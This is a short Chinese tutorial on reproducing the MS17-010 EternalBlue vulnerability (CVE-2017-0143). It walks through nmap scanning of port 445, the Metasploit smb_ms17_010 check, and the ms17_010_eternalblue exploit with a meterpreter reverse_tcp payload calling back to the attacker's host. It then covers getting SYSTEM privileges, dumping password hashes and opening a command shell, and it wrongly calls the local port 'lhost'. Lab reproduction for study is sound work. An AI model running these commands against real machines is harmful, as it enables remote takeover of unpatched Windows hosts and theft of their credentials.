ms17-010 永恒之蓝漏洞复现(CVE-2017-0143)
阅读原文时间:2023年07月11日阅读:1

0x01

首先对目标机的开放端口进行探测,我们可以使用探测神器nmap

发现开放的445端口,然后进行下一步的ms17-010的漏洞验证

0x02

打开MSF美少妇神器,用search命令搜索ms17-010

用use命令选择要使用的扫描模块

use auxiliary/scanner/smb/smb_ms17_010

该模块之前需要设置相关选项,我们使用查看配置信息

show options

需要设置目标地址,设置命令:

**set rhosts 目标地址
**

然后执行run或exploit命令

可以看出目标机存在该漏洞

0x03

下面利用该漏洞完成攻击操作

使用漏洞利用模块

use exploit/windows/smb/ms17_010_eternalblue

show options

设置标记为yes的属性

**set rhosts *目标机地址*
**

反弹shell  set payload  windows/x64/meterpreter/reverse_tcp

show options查看配置信息

**设置配置中缺少的本地主机
**

set lhost** 本地机地址
**

本地端口lhost**默认为4444(可以通过set *lhost* 端口号修改)**

运行exploit或者run,开执行漏洞利用模块,获取来自目标机的会话

0x04

getuid查看一下权限是system

PS:利用该漏洞获得的权限都是system

获取当前系统中的用户散列值

输入shell获取系统命令行的shell

手机扫一扫

移动阅读更方便

阿里云服务器
腾讯云服务器
七牛云服务器